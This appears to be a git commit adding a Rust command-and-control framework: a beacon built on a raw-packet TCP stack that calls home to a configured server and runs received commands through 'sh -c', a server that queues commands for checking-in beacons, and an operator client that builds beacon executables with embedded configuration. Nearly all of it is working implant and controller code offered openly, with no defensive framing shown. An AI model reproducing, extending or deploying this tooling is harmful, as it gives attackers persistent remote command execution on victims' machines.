took the tcp-test code and made a C2 server/beacon

This commit is contained in:
Andrew Rioux
2023-12-05 09:33:06 -05:00
parent 8c0ae083fe
commit 56f39ad64c
12 changed files with 1350 additions and 110 deletions

View File

@@ -0,0 +1,24 @@
[package]
name = "sparse-c2-beacon"
version = "0.1.0"
edition = "2021"
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
[dependencies]
pcap-sys = { path = "../../pcap-sys" }
packets = { path = "../../packets" }
nl-sys = { path = "../../nl-sys" }
sparse-c2-messages = { path = "../sparse-c2-messages" }
rand = "0.8.5"
tokio = { version = "1.32.0", features = ["full"] }
anyhow = "1.0.75"
tokio-stream = { version = "0.1.14", features = ["full"] }
#smoltcp = { version = "0.10", features = ["socket-tcp", "phy-raw_socket", "std", "async", "medium-ethernet", "proto-ipv4", "reassembly-buffer-size-65536", "fragmentation-buffer-size-65536", "proto-ipv4-fragmentation", "log", "verbose"] }
libc = "0.2.148"
log = { version = "0.4.20", features = [ "kv_unstable" ] }
simple_logger = "4.2.0"
ringbuf = "0.3.3"
serde = { version = "1.0.193", features = ["derive"] }
serde_json = "1.0.108"
catconf = "0.1.2"

View File

@@ -0,0 +1,575 @@
use std::{
collections::VecDeque,
mem::MaybeUninit,
net::{Ipv4Addr, SocketAddr},
process::Stdio,
time::{Duration, Instant},
};
use anyhow::{anyhow, bail, Context};
use ringbuf::LocalRb;
use tokio::{
io::Stdout,
process::Command,
sync::mpsc,
task,
time::{sleep, sleep_until},
};
use tokio_stream::StreamExt;
use nl_sys::{netlink, route};
use packets::{
self, ARPMode, ARPPacket, ARPProto, EthernetPacket, IPv4Packet, IPv4Pkt, Layer3Packet,
Layer3Pkt, Layer4Packet, Layer4Pkt, TCPPacket, TCPPacketBuilder, TCPPkt,
};
use pcap_sys;
use sparse_c2_messages::{BeaconCommand, BeaconOptions};
struct PeerInfo {
remote_addr: Ipv4Addr,
remote_port: u16,
local_addr: Ipv4Addr,
local_port: u16,
}
enum Timeout {
Idle { heartbeat: Option<Instant> },
Retransmit {},
}
#[derive(Default)]
struct TcpSocket {
tx_buffer: LocalRb<u8, [MaybeUninit<u8>; 65536]>,
rx_buffer: LocalRb<u8, [MaybeUninit<u8>; 65536]>,
first_ack: u32,
first_rack: u32,
local_seq_no: u32,
remote_seq_no: u32,
remote_last_ack: Option<u32>,
remote_last_win: u16,
local_rx_last_seq: Option<u32>,
local_rx_last_ack: Option<u32>,
state: TcpState,
peer_info: Option<PeerInfo>,
retransmit_timeout: Option<Duration>,
last_packet_received: Option<Instant>,
}
impl TcpSocket {}
#[derive(Default, Debug, Clone, Copy)]
enum TcpState {
Listen,
SynSent,
SynReceived,
Established,
FinWait1,
FinWait2,
CloseWait,
Closing,
LastAck,
TimeWait,
#[default]
Closed,
}
enum TcpOptions {
EndOfList,
NoOp,
MaxSegmentSize(u16),
}
impl TcpOptions {
fn get_bytes(&self) -> Vec<u8> {
match self {
Self::EndOfList => vec![0x00],
Self::NoOp => vec![0x01],
Self::MaxSegmentSize(size) => [&[0x02, 0x04][..], &size.to_be_bytes()].concat(),
}
}
}
fn socket_accepts_packet(socket: &TcpSocket, ip: &IPv4Pkt<'_>, tcp: &TCPPkt<'_>) -> bool {
if let Some(peer) = &socket.peer_info {
peer.local_addr == ip.dest_ip()
&& peer.remote_addr == ip.source_ip()
&& peer.local_port == tcp.dstport()
&& peer.remote_port == tcp.srcport()
} else {
false
}
}
async fn connect(
socket: &mut TcpSocket,
remote_addr: Ipv4Addr,
remote_port: u16,
local_addr: Ipv4Addr,
send_state_changed: &mpsc::Sender<TcpState>,
) -> (u16, TCPPacket) {
socket.state = TcpState::SynSent;
let local_port: u16 = loop {
let port = rand::random();
if port > 40000 {
break port;
}
};
let _ = send_state_changed.send(TcpState::SynSent).await;
socket.peer_info = Some(PeerInfo {
remote_addr,
remote_port,
local_addr,
local_port,
});
socket.local_seq_no = rand::random();
socket.first_ack = socket.local_seq_no;
let packet = TCPPacketBuilder::default()
.srcport(local_port)
.dstport(remote_port)
.syn(true)
.window(64240)
.seqnumber(socket.local_seq_no)
//.options([TcpOptions::MaxSegmentSize(64240).get_bytes()].concat())
.build(local_addr, remote_addr, vec![], None);
(local_port, packet)
}
fn process_timeout(socket: &mut TcpSocket) -> anyhow::Result<Option<(TCPPacketBuilder, Vec<u8>)>> {
Ok(None)
}
async fn process_packet(
socket: &mut TcpSocket,
packet: TCPPkt<'_>,
send_state_changed: &mpsc::Sender<TcpState>,
) -> anyhow::Result<(Vec<(TCPPacketBuilder, Vec<u8>)>, Option<Vec<u8>>)> {
match (&socket.state, &socket.peer_info) {
(TcpState::SynSent, Some(peer)) if packet.ack() && packet.syn() => {
log::debug!("established connection with peer");
socket.remote_last_ack = Some(socket.local_seq_no);
socket.remote_seq_no = packet.seqnumber() + 1;
socket.remote_last_win = packet.window();
socket.first_rack = packet.seqnumber();
socket.local_seq_no += 1;
let tcppacketbuilder = TCPPacketBuilder::default()
.srcport(peer.local_port)
.dstport(peer.remote_port)
.ack(true)
.window(512)
.acknumber(socket.remote_seq_no)
.seqnumber(socket.local_seq_no);
socket.state = TcpState::Established;
let _ = send_state_changed.send(TcpState::Established).await;
Ok((vec![(tcppacketbuilder, vec![])], None))
}
(TcpState::Established, Some(peer)) if packet.fin() => {
log::debug!("Received fin!");
socket.remote_last_ack = Some(socket.local_seq_no);
socket.remote_last_win = packet.window();
socket.remote_seq_no += 1;
socket.state = TcpState::CloseWait;
let _ = send_state_changed.send(TcpState::CloseWait).await;
let ackbuilder = TCPPacketBuilder::default()
.srcport(peer.local_port)
.dstport(peer.remote_port)
.ack(true)
.window(512)
.acknumber(socket.remote_seq_no)
.seqnumber(socket.local_seq_no);
socket.local_seq_no += 1;
let _ = send_state_changed.send(TcpState::Closed).await;
let finbuilder = TCPPacketBuilder::default()
.srcport(peer.local_port)
.dstport(peer.remote_port)
.ack(true)
.window(512)
.acknumber(socket.remote_seq_no)
.seqnumber(socket.local_seq_no);
Ok((vec![(ackbuilder, vec![]), (finbuilder, vec![])], None))
}
(TcpState::Established, Some(peer)) if packet.ack() => {
log::debug!("received packet from server",);
socket.remote_last_ack = Some(socket.local_seq_no);
socket.remote_last_win = packet.window();
socket.remote_seq_no += (packet.data().len() & 0xFFFFFFFF) as u32;
let tcppacketbuilder = TCPPacketBuilder::default()
.srcport(peer.local_port)
.dstport(peer.remote_port)
.ack(true)
.window(512)
.acknumber(socket.remote_seq_no)
.seqnumber(socket.local_seq_no);
if !packet.data().is_empty() {
log::debug!("received data: {:?}", packet.data());
}
Ok((
vec![(tcppacketbuilder, vec![])],
Some(packet.data().to_owned()),
))
}
(TcpState::FinWait1, _) if packet.ack() => {
socket.state = TcpState::FinWait2;
let _ = send_state_changed.send(TcpState::FinWait2).await;
Ok((vec![], None))
}
(TcpState::FinWait2, Some(peer)) if packet.fin() => {
socket.state = TcpState::Closed;
let _ = send_state_changed.send(TcpState::Closed).await;
socket.remote_last_ack = Some(socket.local_seq_no);
socket.remote_seq_no = packet.seqnumber() + 1;
socket.remote_last_win = packet.window();
socket.local_seq_no += 1;
let tcppacketbuilder = TCPPacketBuilder::default()
.srcport(peer.local_port)
.dstport(peer.remote_port)
.ack(true)
.window(512)
.acknumber(socket.remote_seq_no)
.seqnumber(socket.local_seq_no);
Ok((vec![(tcppacketbuilder, vec![])], None))
}
_ => Ok((vec![], None)),
}
}
fn resp_tcp(incoming: &TCPPkt<'_>) -> TCPPacketBuilder {
TCPPacketBuilder::default()
.srcport(incoming.dstport())
.dstport(incoming.srcport())
}
fn seq_tcp(socket: &TcpSocket, mut builder: TCPPacketBuilder) -> TCPPacketBuilder {
builder
}
fn recv_data(socket: &mut TcpSocket, data: &mut [u8]) -> anyhow::Result<usize> {
let (mut prod, mut cons) = socket.tx_buffer.split_ref();
let bytes_read = cons.pop_slice(data);
socket.remote_seq_no += (bytes_read & 0xFFFFFFFF) as u32;
Ok(bytes_read)
}
fn send_data(
socket: &mut TcpSocket,
data: Vec<u8>,
) -> anyhow::Result<Vec<(TCPPacketBuilder, Vec<u8>)>> {
let (mut prod, cons) = socket.tx_buffer.split_ref();
if cons.is_empty() {
_ = prod.push_iter(&mut data.into_iter());
Ok(vec![])
} else {
_ = prod.push_iter(&mut data.into_iter());
Ok(vec![])
}
}
fn close_connection(socket: &mut TcpSocket) -> anyhow::Result<TCPPacket> {
socket.state = TcpState::FinWait1;
let peer = socket
.peer_info
.as_ref()
.context("no connection to close")?;
Ok(TCPPacketBuilder::default()
.srcport(peer.local_port)
.dstport(peer.remote_port)
.fin(true)
.ack(true)
.window(512)
.acknumber(
socket
.local_rx_last_ack
.context("information from synchronizing missing")?,
)
.seqnumber(socket.local_seq_no)
.build(peer.local_addr, peer.remote_addr, vec![], None))
}
struct TcpSocketHandle {
state_changed: mpsc::Receiver<TcpState>,
send_channel: mpsc::Sender<Vec<u8>>,
close: mpsc::Sender<()>,
start_connect: mpsc::Sender<(Ipv4Addr, u16)>,
receiver_channel: mpsc::Receiver<Vec<u8>>,
}
async fn use_socket(conf: BeaconOptions, mut socket_handle: TcpSocketHandle) {
log::info!("Help!");
loop {
log::info!("Starting another loop iteration");
sleep(Duration::from_secs(conf.sleep_secs.into())).await;
log::info!("Done sleeping, verifying connection");
let _ = socket_handle
.start_connect
.send((conf.target_ip, conf.target_port))
.await;
loop {
let state = socket_handle.state_changed.recv().await;
dbg!(&state);
match state {
Some(TcpState::Established) => break,
_ => {}
}
}
log::info!("Connected to server!");
match socket_handle.receiver_channel.recv().await {
Some(bytes) => {
log::info!("received a command!");
match serde_json::from_slice::<BeaconCommand>(&bytes) {
Ok(BeaconCommand::Command(cmd)) => {
log::info!("running command: {}", cmd.command);
let _ = Command::new("sh")
.arg("-c")
.arg(cmd.command)
.stdout(Stdio::inherit())
.output()
.await;
}
Ok(BeaconCommand::Noop) => {}
Err(e) => {
log::error!("could not parse command from server {e:?}");
}
}
}
None => {
log::error!("could not get packets from server")
}
}
log::info!("Done getting data");
loop {
let state = socket_handle.state_changed.recv().await;
log::debug!("got state: {state:?}");
match state {
Some(TcpState::Closed) => break,
_ => {}
}
}
log::info!("Finished connection!");
}
}
#[tokio::main]
async fn main() -> anyhow::Result<()> {
simple_logger::SimpleLogger::new()
.with_level(log::LevelFilter::Trace)
.with_module_level("tcp_test", log::LevelFilter::Info)
.init()?;
let conf_raw = catconf::read_from_exe(sparse_c2_messages::CONF_SEPARATOR, 4096)?;
let conf: sparse_c2_messages::BeaconOptions = serde_json::from_slice(&conf_raw)?;
let ip = conf.target_ip;
let (ifname, _, srcip, src_mac, dst_mac, _) = {
let socket = netlink::Socket::new()?;
let routes = socket.get_routes()?;
let neighs = socket.get_neigh()?;
let links = socket.get_links()?;
let addrs = socket.get_addrs()?;
route::get_macs_and_src_for_ip(&addrs, &routes, &neighs, &links, ip)
.ok_or(anyhow!("unable to find a route to the IP"))?
};
let mut socket = TcpSocket::default();
let mut interface = pcap_sys::Interface::<pcap_sys::DevDisabled>::new(&ifname)?;
let srcip = conf.source_ip;
dbg!(srcip, src_mac, dst_mac);
// let dst_mac = [0x00, 0x16, 0x3e, 0xde, 0xa9, 0x93];
interface.set_buffer_size(8192)?;
interface.set_non_blocking(true)?;
interface.set_promisc(false)?;
interface.set_timeout(10)?;
let interface = interface.activate()?;
macro_rules! format_packet {
($tcp_packet:expr) => {{
let ippkt = IPv4Packet::construct(srcip, ip, &Layer4Packet::TCP($tcp_packet));
EthernetPacket::construct(src_mac, dst_mac, &Layer3Packet::IPv4(ippkt))
}};
}
let (send_state_changed, mut receive_state_changed) = mpsc::channel(64);
let (port, packet) = connect(
&mut socket,
ip,
conf.target_port,
srcip,
&send_state_changed,
)
.await;
_ = receive_state_changed.recv().await;
interface.set_filter(&format!("arp or (inbound and tcp port {port})"), true, None)?;
if interface.datalink() != pcap_sys::consts::DLT_EN10MB {
bail!("interface does not support ethernet");
}
let mut packets = interface.stream()?;
packets.sendpacket(format_packet!(packet).pkt())?;
let (send_channel, mut send_packet) = mpsc::channel(1024);
let (receive_packet, receiver_channel) = mpsc::channel(1024);
let (send_state_changed, state_changed) = mpsc::channel(1024);
let (close, mut recv_close) = mpsc::channel(16);
let (start_connect, mut handle_connect) = mpsc::channel(16);
let socket_handle = TcpSocketHandle {
state_changed,
receiver_channel,
send_channel,
close,
start_connect,
};
task::spawn(async move {
use_socket(conf, socket_handle).await;
});
let mut packet_queue = VecDeque::new();
loop {
let deadline = Instant::now()
+ socket
.retransmit_timeout
.unwrap_or_else(|| Duration::from_millis(10));
tokio::select! {
_ = sleep_until(deadline.into()) => {
let Ok(Some((b, d))) = process_timeout(&mut socket) else { continue; };
let pkt = format_packet!(b.build(srcip, ip, d, None));
packet_queue.push_back(pkt);
},
Some(Ok(bytes)) = packets.next() => {
let pkt = bytes.pkt();
match pkt.get_layer3_pkt() {
Ok(Layer3Pkt::IPv4Pkt(ip_pkt)) => {
let Ok(Layer4Pkt::TCP(tcp_pkt)) = ip_pkt.get_layer4_packet() else { continue; };
if !socket_accepts_packet(&socket, &ip_pkt, &tcp_pkt) {
continue;
}
let Ok((to_send, received)) = process_packet(&mut socket, tcp_pkt, &send_state_changed).await else { continue; };
if let Some(received) = received {
_ = receive_packet.send(received).await;
}
for (b, d) in to_send {
log::trace!("adding packet to send: {b:?}");
let pkt = format_packet!(b.build(srcip, ip, d, None));
packet_queue.push_back(pkt);
}
},
Ok(Layer3Pkt::ARP(arp)) => {
if arp.opcode() != 1 || arp.plen() != 4 || arp.hwlen() != 6 {
continue;
}
let senderip: [u8; 4] = arp.srcprotoaddr().try_into().unwrap();
let sendermac: &[u8] = arp.srchwaddr();
let queryip: [u8; 4] = arp.targetprotoaddr().try_into().unwrap();
let queryip: Ipv4Addr = queryip.into();
if queryip != srcip {
continue;
}
let response = ARPPacket::construct(ARPMode::Reply, ARPProto::IPv4, &src_mac, &sendermac, &queryip.octets(), &senderip);
let resp2 = EthernetPacket::construct(src_mac, sendermac.try_into().unwrap(), &Layer3Packet::ARP(response));
log::trace!("adding packet to send: ARP");
packet_queue.push_back(resp2);
},
_ => continue
};
},
Some((remote_addr, remote_port)) = handle_connect.recv() => {
match socket.state {
TcpState::Established | TcpState::SynSent => {
send_state_changed.send(socket.state).await;
}
_ => {
let (port, packet) = connect(
&mut socket,
ip,
remote_port,
srcip,
&send_state_changed,
)
.await;
packets.set_filter(&format!("arp or (inbound and tcp port {port})"), true, None)?;
packets.sendpacket(format_packet!(packet).pkt())?;
}
}
},
Some(()) = recv_close.recv() => {
log::trace!("adding packet to send: TCP/IP close");
let Ok(to_send) = close_connection(&mut socket) else { continue; };
packet_queue.push_back(format_packet!(to_send));
},
Some(to_send) = send_packet.recv() => {
log::trace!("adding packet to send: TCP/IP message send");
match send_data(&mut socket, to_send) {
Ok(pkts) => {
for (b, d) in pkts {
let pkt = format_packet!(b.build(srcip, ip, d, None));
packet_queue.push_back(pkt);
}
}
_ => continue
}
},
else => { continue; }
}
if let Some(packet) = packet_queue.pop_front() {
log::trace!("sending packet now ({packet:?})");
_ = packets.sendpacket(packet.pkt());
}
}
}

View File

@@ -0,0 +1,13 @@
[package]
name = "sparse-c2-client"
version = "0.1.0"
edition = "2021"
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
[dependencies]
anyhow = "1.0.75"
serde_json = "1.0.108"
sparse-c2-messages = { path = "../sparse-c2-messages" }
structopt = "0.3.26"
tokio = { version = "1.34.0", features = ["full"] }

View File

@@ -0,0 +1,190 @@
use std::{
self,
io::{self, Write},
net::{Ipv4Addr, SocketAddr},
};
use structopt::StructOpt;
use tokio::{
io::{AsyncReadExt, AsyncWriteExt},
net::TcpStream,
};
use sparse_c2_messages::{BeaconId, BeaconOptions, ClientCommand, ClientResponse, CONF_SEPARATOR};
#[cfg(debug_assertions)]
const BEACON: &'static [u8] = include_bytes!("../../../target/debug/sparse-c2-beacon");
#[cfg(not(debug_assertions))]
const BEACON: &'static [u8] = include_bytes!("../../../target/release/sparse-c2-beacon");
#[derive(StructOpt)]
enum Command {
Generate {
#[structopt(short = "i", long)]
target_ip: Ipv4Addr,
#[structopt(short = "p", long)]
target_port: u16,
#[structopt(short = "o", long)]
source_ip: Ipv4Addr,
#[structopt(short = "s", long)]
sleep_secs: u32,
#[structopt(short = "n", long)]
name: String,
},
}
#[derive(StructOpt)]
struct Options {
#[structopt(long, short)]
address: SocketAddr,
#[structopt(subcommand)]
command: Option<Command>,
}
async fn list_state(client: &mut TcpStream) -> anyhow::Result<()> {
let cmd = serde_json::to_vec(&ClientCommand::GetState)?;
client.write(&cmd).await?;
let mut buf = [0u8; 8192];
let len = client.read_u32().await? as usize;
client.read(&mut buf[..len]).await?;
let ClientResponse::StateUpdate(beacons, commands) = serde_json::from_slice(&buf[..len])?;
println!("Commands issued:");
for command in commands {
match command.beacon_id {
Some(beacon) => println!(
"\t[id {}] (targets: {}): {}",
command.command_id.0, beacon.0, command.command
),
None => println!(
"\t[id {}] (targets: all): {}",
command.command_id.0, command.command
),
}
}
println!("\nBeacons:");
for beacon in beacons {
print!("\t[id {}] (listening on: {}) ", beacon.id.0, beacon.port);
match beacon.last_connection {
Some(ci) => print!("last checked in {ci}; "),
None => print!("has not checked in; "),
};
if beacon.done_commands.is_empty() {
println!("no commands executed");
} else {
println!("{} commands executed", beacon.done_commands.len());
for cmd in beacon.done_commands {
println!("\t\t[id {}] executed at {}", cmd.0 .0, cmd.1);
}
}
}
Ok(())
}
#[tokio::main]
async fn main() -> anyhow::Result<()> {
let options = Options::from_args();
let mut client = TcpStream::connect(options.address).await?;
match &options.command {
Some(Command::Generate {
target_ip,
target_port,
source_ip,
sleep_secs,
name,
}) => {
let mut file = tokio::fs::OpenOptions::default()
.write(true)
.create(true)
.mode(0o755)
.open(name)
.await?;
file.write_all(BEACON).await?;
file.write_all(CONF_SEPARATOR).await?;
let conf = serde_json::to_vec(&BeaconOptions {
sleep_secs: *sleep_secs,
target_ip: *target_ip,
source_ip: *source_ip,
target_port: *target_port,
})?;
file.write_all(&conf).await?;
let listen =
serde_json::to_vec(&ClientCommand::ListenFor(name.to_string(), *target_port))?;
client.write_all(&listen).await?;
}
None => {
let stdin = io::stdin();
let mut stdout = io::stdout();
let mut selected_beacon: Option<BeaconId> = None;
loop {
let mut buffer = String::new();
match selected_beacon {
Some(ref bid) => print!("{} >", bid.0),
None => print!("> "),
};
stdout.flush()?;
stdin.read_line(&mut buffer)?;
let mut items = buffer.trim().split(' ');
let cmd = items.next();
match cmd {
None | Some("") => {
eprintln!("Please enter a command!")
}
Some("list") => {
list_state(&mut client).await?;
}
Some("select") => {
let beacon = items.next();
match beacon {
Some(bid) => {
selected_beacon = Some(BeaconId(bid.to_owned()));
}
None => {
eprintln!("No beacon ID selected")
}
}
}
Some("cmd") => {
let parts = items.collect::<Vec<_>>();
let cmd = parts.join(" ");
let cmd = serde_json::to_vec(&ClientCommand::SendCommand(
selected_beacon.clone(),
cmd,
))?;
client.write(&cmd).await?;
let _ = client.read_u32().await?;
}
Some(other) => {
eprintln!("Unknown command: {other}");
}
}
}
}
}
Ok(())
}

View File

@@ -0,0 +1,10 @@
[package]
name = "sparse-c2-messages"
version = "0.1.0"
edition = "2021"
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
[dependencies]
chrono = { version = "0.4.31", features = ["serde"] }
serde = { version = "1.0.193", features = ["derive"] }

View File

@@ -0,0 +1,55 @@
use std::net::Ipv4Addr;
use chrono::prelude::*;
use serde::{Deserialize, Serialize};
pub const CONF_SEPARATOR: &'static [u8] = b"3ce6b7d3741941cbb88756c52ea8afdff45989fc440d47f295f77e068d3e19d4693c007b767b476cac7080c5cfb0bb63";
pub const CLIENT_PORT: u16 = 2034;
#[derive(Deserialize, Serialize, PartialEq, Eq, Clone)]
pub struct BeaconId(pub String);
#[derive(Deserialize, Serialize, PartialEq, Eq, Clone, Copy)]
pub struct CommandId(pub u32);
#[derive(Deserialize, Serialize)]
pub struct BeaconOptions {
pub target_ip: Ipv4Addr,
pub target_port: u16,
pub source_ip: Ipv4Addr,
pub sleep_secs: u32,
}
#[derive(Deserialize, Serialize, Clone)]
pub struct Command {
pub beacon_id: Option<BeaconId>,
pub command_id: CommandId,
pub command: String,
}
#[derive(Deserialize, Serialize, Clone)]
pub struct BeaconInfo {
pub id: BeaconId,
pub port: u16,
pub last_connection: Option<DateTime<Utc>>,
pub done_commands: Vec<(CommandId, DateTime<Utc>)>,
}
#[derive(Deserialize, Serialize)]
pub enum BeaconCommand {
Command(Command),
Noop,
}
#[derive(Deserialize, Serialize)]
pub enum ClientCommand {
GetState,
ListenFor(String, u16),
Stop(String),
SendCommand(Option<BeaconId>, String),
}
#[derive(Deserialize, Serialize)]
pub enum ClientResponse {
StateUpdate(Vec<BeaconInfo>, Vec<Command>),
}

View File

@@ -0,0 +1,16 @@
[package]
name = "sparse-c2-server"
version = "0.1.0"
edition = "2021"
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
[dependencies]
anyhow = "1.0.75"
chrono = "0.4.31"
log = "0.4.20"
nix = "0.27.1"
serde_json = "1.0.108"
simple_logger = "4.3.0"
sparse-c2-messages = { path = "../sparse-c2-messages" }
tokio = { version = "1.34.0", features = ["full"] }

View File

@@ -0,0 +1,205 @@
use std::{
net::Ipv4Addr,
os::fd::AsRawFd,
sync::{
atomic::{AtomicU32, Ordering},
Arc, Mutex,
},
};
use nix::libc::{ioctl, TIOCOUTQ};
use tokio::{
io::{AsyncReadExt, AsyncWriteExt},
net::{TcpListener, TcpStream},
task::yield_now,
};
use sparse_c2_messages::{
BeaconCommand, BeaconId, BeaconInfo, ClientCommand, ClientResponse, Command, CommandId,
CLIENT_PORT,
};
async fn beacon_accept_task(
beacon: Arc<Mutex<BeaconInfo>>,
commands: Arc<Mutex<Vec<Command>>>,
) -> anyhow::Result<()> {
let port = {
let beacon = beacon.lock().unwrap();
beacon.port
};
let socket = TcpListener::bind(format!("0.0.0.0:{port}")).await?;
loop {
let (mut client, _) = socket.accept().await?;
let commands_to_send: Vec<_> = {
let beacon = beacon.lock().unwrap();
let commands = commands.lock().unwrap();
commands
.iter()
.filter(|comm| {
(comm.beacon_id.is_none() || comm.beacon_id.as_ref() == Some(&beacon.id))
&& !beacon
.done_commands
.iter()
.any(|done_comm| done_comm.0 == comm.command_id)
})
.map(Clone::clone)
.collect()
};
{
let mut beacon = beacon.lock().unwrap();
log::info!("Beacon {} checking in", beacon.id.0);
beacon.last_connection = Some(chrono::Utc::now());
}
let Some(ref command_to_send) = commands_to_send.get(0) else {
let Ok(buffer) = serde_json::to_vec(&BeaconCommand::Noop) else {
continue;
};
let _ = client.write_all(&buffer).await;
let mut res = 0i16;
unsafe {
ioctl(client.as_raw_fd(), TIOCOUTQ, &mut res);
}
while res != 0 {
yield_now().await;
unsafe {
ioctl(client.as_raw_fd(), TIOCOUTQ, &mut res);
}
}
continue;
};
let Ok(buffer) = serde_json::to_vec(&BeaconCommand::Command((*command_to_send).clone()))
else {
continue;
};
let _ = client.write_all(&buffer).await;
let mut res = 0i16;
unsafe {
ioctl(client.as_raw_fd(), TIOCOUTQ, &mut res);
}
while res != 0 {
yield_now().await;
unsafe {
ioctl(client.as_raw_fd(), TIOCOUTQ, &mut res);
}
}
{
let mut beacon = beacon.lock().unwrap();
beacon
.done_commands
.push((command_to_send.command_id, chrono::Utc::now()));
}
}
}
async fn handle_client(
command_id: Arc<AtomicU32>,
mut client: TcpStream,
beacons: Arc<Mutex<Vec<Arc<Mutex<BeaconInfo>>>>>,
commands: Arc<Mutex<Vec<Command>>>,
) -> anyhow::Result<()> {
loop {
let mut buffer = [0u8; 1024];
let len = client.read(&mut buffer[..]).await?;
let Ok(cmd) = serde_json::from_slice::<ClientCommand>(&buffer[..len]) else {
continue;
};
match cmd {
ClientCommand::GetState => {
let beacons = {
let beacons = beacons.lock().unwrap();
beacons
.iter()
.map(|beacon| beacon.lock().unwrap().clone())
.collect()
};
let commands = {
let commands = commands.lock().unwrap();
commands.clone()
};
let res = serde_json::to_vec(&ClientResponse::StateUpdate(beacons, commands))?;
client.write_u32(res.len() as u32).await?;
client.write(&res).await?;
}
ClientCommand::ListenFor(id, port) => {
let beacon = Arc::new(Mutex::new(BeaconInfo {
id: BeaconId(id),
port,
last_connection: None,
done_commands: vec![],
}));
{
let mut beacons = beacons.lock().unwrap();
beacons.push(Arc::clone(&beacon));
}
let commands = Arc::clone(&commands);
tokio::spawn(async move {
if let Err(e) = beacon_accept_task(beacon, commands).await {
log::error!("could not handle beacon listener: {e:?}");
}
});
client.write_u32(0).await?;
}
ClientCommand::SendCommand(id, command) => {
{
let mut commands = commands.lock().unwrap();
let command_id = CommandId(command_id.fetch_add(1, Ordering::SeqCst));
commands.push(Command {
beacon_id: id,
command_id,
command,
});
}
client.write_u32(0).await?;
}
ClientCommand::Stop(_) => {
client.write_u32(0).await?;
}
}
}
}
#[tokio::main(flavor = "current_thread")]
async fn main() -> anyhow::Result<()> {
simple_logger::SimpleLogger::new()
.with_level(log::LevelFilter::Trace)
.with_module_level("tcp_test", log::LevelFilter::Trace)
.init()?;
let commands = Arc::new(Mutex::new(vec![]));
let beacons = Arc::new(Mutex::new(vec![]));
let socket = TcpListener::bind(format!("0.0.0.0:{CLIENT_PORT}")).await?;
let command_id = Arc::new(AtomicU32::from(0));
loop {
let (client, _) = socket.accept().await?;
let beacons = Arc::clone(&beacons);
let commands = Arc::clone(&commands);
let command_id = Arc::clone(&command_id);
tokio::spawn(async {
if let Err(e) = handle_client(command_id, client, beacons, commands).await {
log::error!("error handling client {e:?}");
}
});
}
}